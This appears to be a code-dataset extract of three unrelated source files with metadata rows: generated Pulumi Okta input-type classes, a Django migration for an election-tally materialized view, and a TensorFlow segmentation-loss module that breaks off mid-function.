def name(self, value: pulumi.Input[str]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Groups claim type. Valid values: `"FILTER"`, `"EXPRESSION"`.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def value(self) -> pulumi.Input[str]:
"""
Value of the claim. Can be an Okta Expression Language statement that evaluates at the time the token is minted.
"""
return pulumi.get(self, "value")
@value.setter
def value(self, value: pulumi.Input[str]):
pulumi.set(self, "value", value)
@property
@pulumi.getter(name="filterType")
def filter_type(self) -> Optional[pulumi.Input[str]]:
"""
Groups claim filter. Can only be set if type is `"FILTER"`. Valid values: `"EQUALS"`, `"STARTS_WITH"`, `"CONTAINS"`, `"REGEX"`.
"""
return pulumi.get(self, "filter_type")
@filter_type.setter
def filter_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "filter_type", value)
@pulumi.input_type
class OAuthJwkArgs:
def __init__(__self__, *,
kid: pulumi.Input[str],
kty: pulumi.Input[str],
e: Optional[pulumi.Input[str]] = None,
n: Optional[pulumi.Input[str]] = None):
pulumi.set(__self__, "kid", kid)
pulumi.set(__self__, "kty", kty)
if e is not None:
pulumi.set(__self__, "e", e)
if n is not None:
pulumi.set(__self__, "n", n)
@property
@pulumi.getter
def kid(self) -> pulumi.Input[str]:
return pulumi.get(self, "kid")
@kid.setter
def kid(self, value: pulumi.Input[str]):
pulumi.set(self, "kid", value)
@property
@pulumi.getter
def kty(self) -> pulumi.Input[str]:
return pulumi.get(self, "kty")
@kty.setter
def kty(self, value: pulumi.Input[str]):
pulumi.set(self, "kty", value)
@property
@pulumi.getter
def e(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "e")
@e.setter
def e(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "e", value)
@property
@pulumi.getter
def n(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "n")
@n.setter
def n(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "n", value)
@pulumi.input_type
class OAuthUserArgs:
def __init__(__self__, *,
id: Optional[pulumi.Input[str]] = None,
password: Optional[pulumi.Input[str]] = None,
scope: Optional[pulumi.Input[str]] = None,
username: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] id: ID of the application.
"""
if id is not None:
pulumi.set(__self__, "id", id)
if password is not None:
pulumi.set(__self__, "password", password)
if scope is not None:
pulumi.set(__self__, "scope", scope)
if username is not None:
pulumi.set(__self__, "username", username)
@property
@pulumi.getter
def id(self) -> Optional[pulumi.Input[str]]:
"""
ID of the application.
"""
return pulumi.get(self, "id")
@id.setter
def id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "id", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter
def scope(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "scope")
@scope.setter
def scope(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "scope", value)
@property
@pulumi.getter
def username(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "username")
@username.setter
def username(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "username", value)
@pulumi.input_type
class SamlAttributeStatementArgs:
def __init__(__self__, *,
name: pulumi.Input[str],
filter_type: Optional[pulumi.Input[str]] = None,
filter_value: Optional[pulumi.Input[str]] = None,
namespace: Optional[pulumi.Input[str]] = None,
type: Optional[pulumi.Input[str]] = None,
values: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
"""
:param pulumi.Input[str] name: The name of the attribute statement.
:param pulumi.Input[str] filter_type: Type of group attribute filter. Valid values are: `"STARTS_WITH"`, `"EQUALS"`, `"CONTAINS"`, or `"REGEX"`
:param pulumi.Input[str] filter_value: Filter value to use.
:param pulumi.Input[str] namespace: The attribute namespace. It can be set to `"urn:oasis:names:tc:SAML:2.0:attrname-format:unspecified"`, `"urn:oasis:names:tc:SAML:2.0:attrname-format:uri"`, or `"urn:oasis:names:tc:SAML:2.0:attrname-format:basic"`.
:param pulumi.Input[str] type: The type of attribute statement value. Valid values are: `"EXPRESSION"` or `"GROUP"`. Default is `"EXPRESSION"`.
:param pulumi.Input[Sequence[pulumi.Input[str]]] values: Array of values to use.
"""
pulumi.set(__self__, "name", name)
if filter_type is not None:
pulumi.set(__self__, "filter_type", filter_type)
if filter_value is not None:
pulumi.set(__self__, "filter_value", filter_value)
if namespace is not None:
pulumi.set(__self__, "namespace", namespace)
if type is not None:
pulumi.set(__self__, "type", type)
if values is not None:
pulumi.set(__self__, "values", values)
@property
@pulumi.getter
def name(self) -> pulumi.Input[str]:
"""
The name of the attribute statement.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: pulumi.Input[str]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="filterType")
def filter_type(self) -> Optional[pulumi.Input[str]]:
"""
Type of group attribute filter. Valid values are: `"STARTS_WITH"`, `"EQUALS"`, `"CONTAINS"`, or `"REGEX"`
"""
return pulumi.get(self, "filter_type")
@filter_type.setter
def filter_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "filter_type", value)
@property
@pulumi.getter(name="filterValue")
def filter_value(self) -> Optional[pulumi.Input[str]]:
"""
Filter value to use.
"""
return pulumi.get(self, "filter_value")
@filter_value.setter
def filter_value(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "filter_value", value)
@property
@pulumi.getter
def namespace(self) -> Optional[pulumi.Input[str]]:
"""
The attribute namespace. It can be set to `"urn:oasis:names:tc:SAML:2.0:attrname-format:unspecified"`, `"urn:oasis:names:tc:SAML:2.0:attrname-format:uri"`, or `"urn:oasis:names:tc:SAML:2.0:attrname-format:basic"`.
"""
return pulumi.get(self, "namespace")
@namespace.setter
def namespace(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "namespace", value)
@property
@pulumi.getter
def type(self) -> Optional[pulumi.Input[str]]:
"""
The type of attribute statement value. Valid values are: `"EXPRESSION"` or `"GROUP"`. Default is `"EXPRESSION"`.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def values(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Array of values to use.
"""
return pulumi.get(self, "values")
@values.setter
def values(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "values", value)
@pulumi.input_type
class SamlUserArgs:
def __init__(__self__, *,
id: Optional[pulumi.Input[str]] = None,
password: Optional[pulumi.Input[str]] = None,
scope: Optional[pulumi.Input[str]] = None,
username: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] id: id of application.
"""
if id is not None:
pulumi.set(__self__, "id", id)
if password is not None:
pulumi.set(__self__, "password", password)
if scope is not None:
pulumi.set(__self__, "scope", scope)
if username is not None:
pulumi.set(__self__, "username", username)
@property
@pulumi.getter
def id(self) -> Optional[pulumi.Input[str]]:
"""
id of application.
"""
return pulumi.get(self, "id")
@id.setter
def id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "id", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter
def scope(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "scope")
@scope.setter
def scope(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "scope", value)
@property
@pulumi.getter
def username(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "username")
@username.setter
def username(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "username", value)
@pulumi.input_type
class SecurePasswordStoreUserArgs:
def __init__(__self__, *,
id: Optional[pulumi.Input[str]] = None,
password: Optional[pulumi.Input[str]] = None,
scope: Optional[pulumi.Input[str]] = None,
username: Optional[pulumi.Input[str]] = None):
if id is not None:
pulumi.set(__self__, "id", id)
if password is not None:
pulumi.set(__self__, "password", password)
if scope is not None:
pulumi.set(__self__, "scope", scope)
if username is not None:
pulumi.set(__self__, "username", username)
@property
@pulumi.getter
def id(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "id")
@id.setter
def id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "id", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter
def scope(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "scope")
@scope.setter
def scope(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "scope", value)
@property
@pulumi.getter
def username(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "username")
@username.setter
def username(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "username", value)
@pulumi.input_type
class SwaUserArgs:
def __init__(__self__, *,
id: Optional[pulumi.Input[str]] = None,
password: Optional[pulumi.Input[str]] = None,
scope: Optional[pulumi.Input[str]] = None,
username: Optional[pulumi.Input[str]] = None):
if id is not None:
pulumi.set(__self__, "id", id)
if password is not None:
pulumi.set(__self__, "password", password)
if scope is not None:
pulumi.set(__self__, "scope", scope)
if username is not None:
pulumi.set(__self__, "username", username)
@property
@pulumi.getter
def id(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "id")
@id.setter
def id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "id", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter
def scope(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "scope")
@scope.setter
def scope(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "scope", value)
@property
@pulumi.getter
def username(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "username")
@username.setter
def username(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "username", value)
@pulumi.input_type
class ThreeFieldUserArgs:
def __init__(__self__, *,
id: Optional[pulumi.Input[str]] = None,
password: Optional[pulumi.Input[str]] = None,
scope: Optional[pulumi.Input[str]] = None,
username: Optional[pulumi.Input[str]] = None):
if id is not None:
pulumi.set(__self__, "id", id)
if password is not None:
pulumi.set(__self__, "password", password)
if scope is not None:
pulumi.set(__self__, "scope", scope)
if username is not None:
pulumi.set(__self__, "username", username)
@property
@pulumi.getter
def id(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "id")
@id.setter
def id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "id", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter
def scope(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "scope")
@scope.setter
def scope(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "scope", value)
@property
@pulumi.getter
def username(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "username")
@username.setter
def username(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "username", value)
@pulumi.input_type
class UserSchemaArrayOneOfArgs:
def __init__(__self__, *,
const: pulumi.Input[str],
title: pulumi.Input[str]):
"""
:param pulumi.Input[str] const: value mapping to member of `enum`.
:param pulumi.Input[str] title: display name for the enum value.
"""
pulumi.set(__self__, "const", const)
pulumi.set(__self__, "title", title)
@property
@pulumi.getter
def const(self) -> pulumi.Input[str]:
"""
value mapping to member of `enum`.
"""
return pulumi.get(self, "const")
@const.setter
def const(self, value: pulumi.Input[str]):
pulumi.set(self, "const", value)
@property
@pulumi.getter
def title(self) -> pulumi.Input[str]:
"""
display name for the enum value.
"""
return pulumi.get(self, "title")
@title.setter
def title(self, value: pulumi.Input[str]):
pulumi.set(self, "title", value)
@pulumi.input_type
class UserSchemaOneOfArgs:
def __init__(__self__, *,
const: pulumi.Input[str],
title: pulumi.Input[str]):
"""
:param pulumi.Input[str] const: value mapping to member of `enum`.
:param pulumi.Input[str] title: display name for the enum value.
"""
pulumi.set(__self__, "const", const)
pulumi.set(__self__, "title", title)
@property
@pulumi.getter
def const(self) -> pulumi.Input[str]:
"""
value mapping to member of `enum`.
"""
return pulumi.get(self, "const")
@const.setter
def const(self, value: pulumi.Input[str]):
pulumi.set(self, "const", value)
@property
@pulumi.getter
def title(self) -> pulumi.Input[str]:
"""
display name for the enum value.
"""
return pulumi.get(self, "title")
@title.setter
def title(self, value: pulumi.Input[str]):
pulumi.set(self, "title", value)
@pulumi.input_type
class GetSamlAttributeStatementArgs:
def __init__(__self__, *,
filter_type: str,
filter_value: str,
name: str,
namespace: str,
type: str,
values: Sequence[str]):
"""
:param str filter_type: Type of group attribute filter.
:param str filter_value: Filter value to use.
:param str name: The name of the attribute statement.
:param str namespace: The attribute namespace.
:param str type: The type of attribute statement value.
:param Sequence[str] values: Array of values to use.
"""
pulumi.set(__self__, "filter_type", filter_type)
pulumi.set(__self__, "filter_value", filter_value)
pulumi.set(__self__, "name", name)
pulumi.set(__self__, "namespace", namespace)
pulumi.set(__self__, "type", type)
pulumi.set(__self__, "values", values)
@property
@pulumi.getter(name="filterType")
def filter_type(self) -> str:
"""
Type of group attribute filter.
"""
return pulumi.get(self, "filter_type")
@filter_type.setter
def filter_type(self, value: str):
pulumi.set(self, "filter_type", value)
@property
@pulumi.getter(name="filterValue")
def filter_value(self) -> str:
"""
Filter value to use.
"""
return pulumi.get(self, "filter_value")
@filter_value.setter
def filter_value(self, value: str):
pulumi.set(self, "filter_value", value)
@property
@pulumi.getter
def name(self) -> str:
"""
The name of the attribute statement.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: str):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def namespace(self) -> str:
"""
The attribute namespace.
"""
return pulumi.get(self, "namespace")
@namespace.setter
def namespace(self, value: str):
pulumi.set(self, "namespace", value)
@property
@pulumi.getter
def type(self) -> str:
"""
The type of attribute statement value.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: str):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def values(self) -> Sequence[str]:
"""
Array of values to use.
"""
return pulumi.get(self, "values")
@values.setter
def values(self, value: Sequence[str]):
pulumi.set(self, "values", value)
| 31.059908 | 257 | 0.595957 | 3,168 | 26,960 | 4.943182 | 0.043876 | 0.130651 | 0.150192 | 0.164368 | 0.916986 | 0.88659 | 0.867178 | 0.840294 | 0.807727 | 0.777331 | 0 | 0.000659 | 0.267953 | 26,960 | 867 | 258 | 31.095732 | 0.792815 | 0.128264 | 0 | 0.817133 | 1 | 0 | 0.057344 | 0.004687 | 0 | 0 | 0 | 0 | 0 | 1 | 0.207578 | false | 0.108731 | 0.008237 | 0.052718 | 0.331137 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 11 |
3f0451df741567ab7ca0642032d5540fdf15e891 | 9,896 | py | Python | tally_ho/apps/tally/migrations/0036_allcandidatesvotes.py | onaio/tally-ho | f7a81909755924370653051bfc8315588dc75356 | [
"Apache-2.0"
] | 12 | 2015-09-07T17:12:42.000Z | 2021-12-29T07:51:18.000Z | tally_ho/apps/tally/migrations/0036_allcandidatesvotes.py | onaio/tally-ho | f7a81909755924370653051bfc8315588dc75356 | [
"Apache-2.0"
] | 122 | 2018-09-18T04:05:39.000Z | 2022-01-17T10:12:48.000Z | tally_ho/apps/tally/migrations/0036_allcandidatesvotes.py | onaio/tally-ho | f7a81909755924370653051bfc8315588dc75356 | [
"Apache-2.0"
] | 13 | 2015-06-06T17:32:34.000Z | 2020-09-10T12:58:07.000Z | # Generated by Django 2.1.1 on 2021-02-01 13:45
import django.contrib.postgres.fields
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('tally', '0035_auto_20201206_0709'),
]
operations = [
migrations.CreateModel(
name='AllCandidatesVotes',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('tally_id', models.IntegerField()),
('full_name', models.CharField(max_length=255)),
('ballot_number', models.IntegerField()),
('candidate_id', models.IntegerField()),
('candidate_active', models.BooleanField(default=False)),
('stations', models.PositiveIntegerField(default=0)),
('center_ids', django.contrib.postgres.fields.ArrayField(
base_field=models.IntegerField(), size=None)),
('station_numbers', django.contrib.postgres.fields.ArrayField(base_field=models.PositiveSmallIntegerField(blank=True, null=True), size=None)),
('stations_completed', models.PositiveIntegerField(default=0)),
('votes', models.PositiveIntegerField(default=0)),
('total_votes', models.PositiveIntegerField(default=0)),
('all_candidate_votes', models.PositiveIntegerField(default=0)),
('candidate_votes_included_quarantine', models.PositiveIntegerField(default=0)),
('stations_complete_percent', models.IntegerField()),
],
options={
'managed': False,
},
),
migrations.RunSQL(
"""
CREATE MATERIALIZED VIEW tally_allcandidatesvotes AS
SELECT "tally_candidate"."full_name", "tally_candidate"."tally_id" AS "tally_id", "tally_candidate"."id" AS "candidate_id", "tally_ballot"."number" AS "ballot_number", "tally_candidate"."active" AS "candidate_active", COUNT("tally_resultform"."id") FILTER (WHERE ("tally_resultform"."ballot_id" IS NOT NULL AND "tally_resultform"."center_id" IS NOT NULL AND "tally_resultform"."station_number" IS NOT NULL AND "tally_resultform"."tally_id" = ("tally_candidate"."tally_id"))) AS "stations", COUNT("tally_resultform"."id") FILTER (WHERE ("tally_resultform"."ballot_id" IS NOT NULL AND "tally_resultform"."center_id" IS NOT NULL AND "tally_resultform"."form_state" = 0 AND "tally_resultform"."station_number" IS NOT NULL AND "tally_resultform"."tally_id" = ("tally_candidate"."tally_id"))) AS "stations_completed", (SELECT CASE WHEN U0."votes" IS NOT NULL THEN U0."votes" ELSE 0 END AS "candidate_votes" FROM "tally_result" U0 INNER JOIN "tally_candidate" U1 ON (U0."candidate_id" = U1."id") INNER JOIN "tally_resultform" U3 ON (U0."result_form_id" = U3."id") WHERE (U0."active" = true AND U0."candidate_id" = ("tally_candidate"."id") AND U1."tally_id" = ("tally_candidate"."tally_id") AND U0."entry_version" = 2 AND U3."form_state" = 0) LIMIT 1) AS "votes", CASE WHEN (SELECT CASE WHEN U0."votes" IS NOT NULL THEN U0."votes" ELSE 0 END AS "candidate_votes" FROM "tally_result" U0 INNER JOIN "tally_candidate" U1 ON (U0."candidate_id" = U1."id") INNER JOIN "tally_resultform" U3 ON (U0."result_form_id" = U3."id") WHERE (U0."active" = true AND U0."candidate_id" = ("tally_candidate"."id") AND U1."tally_id" = ("tally_candidate"."tally_id") AND U0."entry_version" = 2 AND U3."form_state" = 0) LIMIT 1) IS NOT NULL THEN (SELECT CASE WHEN U0."votes" IS NOT NULL THEN U0."votes" ELSE 0 END AS "candidate_votes" FROM "tally_result" U0 INNER JOIN "tally_candidate" U1 ON (U0."candidate_id" = U1."id") INNER JOIN "tally_resultform" U3 ON (U0."result_form_id" = U3."id") WHERE (U0."active" = true AND U0."candidate_id" = ("tally_candidate"."id") AND U1."tally_id" = ("tally_candidate"."tally_id") AND U0."entry_version" = 2 AND U3."form_state" = 0) LIMIT 1) ELSE 0 END AS "total_votes", (SELECT CASE WHEN U0."votes" IS NOT NULL THEN U0."votes" ELSE 0 END AS "candidate_votes" FROM "tally_result" U0 INNER JOIN "tally_candidate" U1 ON (U0."candidate_id" = U1."id") INNER JOIN "tally_resultform" U3 ON (U0."result_form_id" = U3."id") WHERE (U0."active" = true AND U0."candidate_id" = ("tally_candidate"."id") AND U1."tally_id" = ("tally_candidate"."tally_id") AND U0."entry_version" = 2 AND (U3."form_state" = 0 OR U3."form_state" = 2)) LIMIT 1) AS "all_candidate_votes", CASE WHEN (SELECT CASE WHEN U0."votes" IS NOT NULL THEN U0."votes" ELSE 0 END AS "candidate_votes" FROM "tally_result" U0 INNER JOIN "tally_candidate" U1 ON (U0."candidate_id" = U1."id") INNER JOIN "tally_resultform" U3 ON (U0."result_form_id" = U3."id") WHERE (U0."active" = true AND U0."candidate_id" = ("tally_candidate"."id") AND U1."tally_id" = ("tally_candidate"."tally_id") AND U0."entry_version" = 2 AND (U3."form_state" = 0 OR U3."form_state" = 2)) LIMIT 1) IS NOT NULL THEN (SELECT CASE WHEN U0."votes" IS NOT NULL THEN U0."votes" ELSE 0 END AS "candidate_votes" FROM "tally_result" U0 INNER JOIN "tally_candidate" U1 ON (U0."candidate_id" = U1."id") INNER JOIN "tally_resultform" U3 ON (U0."result_form_id" = U3."id") WHERE (U0."active" = true AND U0."candidate_id" = ("tally_candidate"."id") AND U1."tally_id" = ("tally_candidate"."tally_id") AND U0."entry_version" = 2 AND (U3."form_state" = 0 OR U3."form_state" = 2)) LIMIT 1) ELSE 0 END AS "candidate_votes_included_quarantine", CASE WHEN COUNT("tally_resultform"."id") FILTER (WHERE ("tally_resultform"."ballot_id" IS NOT NULL AND "tally_resultform"."center_id" IS NOT NULL AND "tally_resultform"."station_number" IS NOT NULL AND "tally_resultform"."tally_id" = ("tally_candidate"."tally_id"))) > 0 THEN ROUND(CAST(((100 * CAST(COUNT("tally_resultform"."id") FILTER (WHERE ("tally_resultform"."ballot_id" IS NOT NULL AND "tally_resultform"."center_id" IS NOT NULL AND "tally_resultform"."form_state" = 0 AND "tally_resultform"."station_number" IS NOT NULL AND "tally_resultform"."tally_id" = ("tally_candidate"."tally_id"))) AS FLOAT)) / CAST(COUNT("tally_resultform"."id") FILTER (WHERE ("tally_resultform"."ballot_id" IS NOT NULL AND "tally_resultform"."center_id" IS NOT NULL AND "tally_resultform"."station_number" IS NOT NULL AND "tally_resultform"."tally_id" = ("tally_candidate"."tally_id"))) AS FLOAT)) AS numeric), 3) ELSE 0 END AS "stations_complete_percent", ARRAY_AGG(DISTINCT "tally_center"."id") AS "center_ids", ARRAY_AGG(DISTINCT "tally_resultform"."station_number") AS "station_numbers" FROM "tally_candidate" INNER JOIN "tally_ballot" ON ("tally_candidate"."ballot_id" = "tally_ballot"."id") LEFT OUTER JOIN "tally_resultform" ON ("tally_ballot"."id" = "tally_resultform"."ballot_id") LEFT OUTER JOIN "tally_center" ON ("tally_resultform"."center_id" = "tally_center"."id") GROUP BY "tally_candidate"."id", "tally_ballot"."number", (SELECT CASE WHEN U0."votes" IS NOT NULL THEN U0."votes" ELSE 0 END AS "candidate_votes" FROM "tally_result" U0 INNER JOIN "tally_candidate" U1 ON (U0."candidate_id" = U1."id") INNER JOIN "tally_resultform" U3 ON (U0."result_form_id" = U3."id") WHERE (U0."active" = true AND U0."candidate_id" = ("tally_candidate"."id") AND U1."tally_id" = ("tally_candidate"."tally_id") AND U0."entry_version" = 2 AND U3."form_state" = 0) LIMIT 1), CASE WHEN (SELECT CASE WHEN U0."votes" IS NOT NULL THEN U0."votes" ELSE 0 END AS "candidate_votes" FROM "tally_result" U0 INNER JOIN "tally_candidate" U1 ON (U0."candidate_id" = U1."id") INNER JOIN "tally_resultform" U3 ON (U0."result_form_id" = U3."id") WHERE (U0."active" = true AND U0."candidate_id" = ("tally_candidate"."id") AND U1."tally_id" = ("tally_candidate"."tally_id") AND U0."entry_version" = 2 AND U3."form_state" = 0) LIMIT 1) IS NOT NULL THEN (SELECT CASE WHEN U0."votes" IS NOT NULL THEN U0."votes" ELSE 0 END AS "candidate_votes" FROM "tally_result" U0 INNER JOIN "tally_candidate" U1 ON (U0."candidate_id" = U1."id") INNER JOIN "tally_resultform" U3 ON (U0."result_form_id" = U3."id") WHERE (U0."active" = true AND U0."candidate_id" = ("tally_candidate"."id") AND U1."tally_id" = ("tally_candidate"."tally_id") AND U0."entry_version" = 2 AND U3."form_state" = 0) LIMIT 1) ELSE 0 END, (SELECT CASE WHEN U0."votes" IS NOT NULL THEN U0."votes" ELSE 0 END AS "candidate_votes" FROM "tally_result" U0 INNER JOIN "tally_candidate" U1 ON (U0."candidate_id" = U1."id") INNER JOIN "tally_resultform" U3 ON (U0."result_form_id" = U3."id") WHERE (U0."active" = true AND U0."candidate_id" = ("tally_candidate"."id") AND U1."tally_id" = ("tally_candidate"."tally_id") AND U0."entry_version" = 2 AND (U3."form_state" = 0 OR U3."form_state" = 2)) LIMIT 1), CASE WHEN (SELECT CASE WHEN U0."votes" IS NOT NULL THEN U0."votes" ELSE 0 END AS "candidate_votes" FROM "tally_result" U0 INNER JOIN "tally_candidate" U1 ON (U0."candidate_id" = U1."id") INNER JOIN "tally_resultform" U3 ON (U0."result_form_id" = U3."id") WHERE (U0."active" = true AND U0."candidate_id" = ("tally_candidate"."id") AND U1."tally_id" = ("tally_candidate"."tally_id") AND U0."entry_version" = 2 AND (U3."form_state" = 0 OR U3."form_state" = 2)) LIMIT 1) IS NOT NULL THEN (SELECT CASE WHEN U0."votes" IS NOT NULL THEN U0."votes" ELSE 0 END AS "candidate_votes" FROM "tally_result" U0 INNER JOIN "tally_candidate" U1 ON (U0."candidate_id" = U1."id") INNER JOIN "tally_resultform" U3 ON (U0."result_form_id" = U3."id") WHERE (U0."active" = true AND U0."candidate_id" = ("tally_candidate"."id") AND U1."tally_id" = ("tally_candidate"."tally_id") AND U0."entry_version" = 2 AND (U3."form_state" = 0 OR U3."form_state" = 2)) LIMIT 1) ELSE 0 END;
CREATE UNIQUE INDEX tally_allcandidatesvotes_pk ON tally_allcandidatesvotes(candidate_id);
""",
"""
DROP MATERIALIZED VIEW tally_allcandidatesvotes;
"""
),
]
| 201.959184 | 7,845 | 0.697049 | 1,485 | 9,896 | 4.439057 | 0.082828 | 0.101942 | 0.042324 | 0.057342 | 0.777306 | 0.747573 | 0.736954 | 0.736954 | 0.721177 | 0.721177 | 0 | 0.033409 | 0.153092 | 9,896 | 48 | 7,846 | 206.166667 | 0.753132 | 0.004547 | 0 | 0.057143 | 1 | 0 | 0.150346 | 0.047811 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.057143 | 0 | 0.142857 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
3f07eb61fa4e7ba5e14eeee5985fa4739c27ea60 | 5,422 | py | Python | modules/old/losses_segmentation.py | jperezvisaires/tfg-intphys | 8c32c383bf00c00b0fc627ba7bf1192bc3011c40 | [
"MIT"
] | 1 | 2020-01-25T19:43:45.000Z | 2020-01-25T19:43:45.000Z | modules/old/losses_segmentation.py | jperezvisaires/tfg-intphys | 8c32c383bf00c00b0fc627ba7bf1192bc3011c40 | [
"MIT"
] | null | null | null | modules/old/losses_segmentation.py | jperezvisaires/tfg-intphys | 8c32c383bf00c00b0fc627ba7bf1192bc3011c40 | [
"MIT"
] | null | null | null | import tensorflow as tf
# Weighted Cross Entropy (WCE).
def weighted_crossentropy(beta=1):
def convert_to_logits(y_pred):
y_pred = tf.clip_by_value(y_pred, tf.keras.backend.epsilon(), 1 - tf.keras.backend.epsilon())
return tf.math.log(y_pred / (1 - y_pred))
def weighted_crossentropy_loss(y_true, y_pred):
y_pred = convert_to_logits(y_pred)
loss = tf.nn.weighted_cross_entropy_with_logits(logits=y_pred,
labels=y_true,
pos_weight=beta)
return tf.math.reduce_mean(loss)
return weighted_crossentropy_loss
# Balanced Cross Entropy (BCE).
def balanced_crossentropy(beta=0.5):
def convert_to_logits(y_pred):
y_pred = tf.clip_by_value(y_pred, tf.keras.backend.epsilon(), 1 - tf.keras.backend.epsilon())
return tf.math.log(y_pred / (1 - y_pred))
def balanced_crossentropy_loss(y_true, y_pred):
y_pred = convert_to_logits(y_pred)
pos_weight = beta / (1 - beta)
loss = tf.nn.weighted_cross_entropy_with_logits(logits=y_pred,
labels=y_true,
pos_weight=pos_weight)
return tf.math.reduce_mean(loss * (1 - beta))
return balanced_crossentropy_loss
# Focal Loss (FL).
def focal(alpha=0.5, gamma=0):
def convert_to_logits(y_pred):
y_pred = tf.clip_by_value(y_pred, tf.keras.backend.epsilon(), 1 - tf.keras.backend.epsilon())
return tf.math.log(y_pred / (1 - y_pred))
def focal_loss_with_logits(logits, targets, alpha, gamma, y_pred):
weight_a = alpha * (1 - y_pred) ** gamma * targets
weight_b = (1 - alpha) * y_pred ** gamma * (1 - targets)
return tf.math.log1p(tf.math.exp(-tf.math.abs(logits))) + tf.nn.relu(-logits) * (weight_a + weight_b) + logits * weight_b
def focal_loss(y_true, y_pred):
logits = convert_to_logits(y_pred)
loss = focal_loss_with_logits(logits=logits, targets=y_true, alpha=alpha, gamma=gamma, y_pred=y_pred)
return tf.math.reduce_mean(loss)
return focal_loss
# Dice Loss (F1 Score).
def dice():
def dice_loss(y_true, y_pred):
numerator = 2 * tf.math.reduce_sum(y_true * y_pred, axis=(1,2,3))
denominator = tf.math.reduce_sum(y_true + y_pred, axis=(1,2,3))
return 1 - numerator / denominator
def dice_coefficient(y_true, y_pred):
return 1 - dice_loss(y_true, y_pred)
return dice_loss, dice_coefficient
# Jaccard Loss (IoU).
def jaccard():
def dice_loss(y_true, y_pred):
numerator = 2 * tf.math.reduce_sum(y_true * y_pred, axis=(1,2,3))
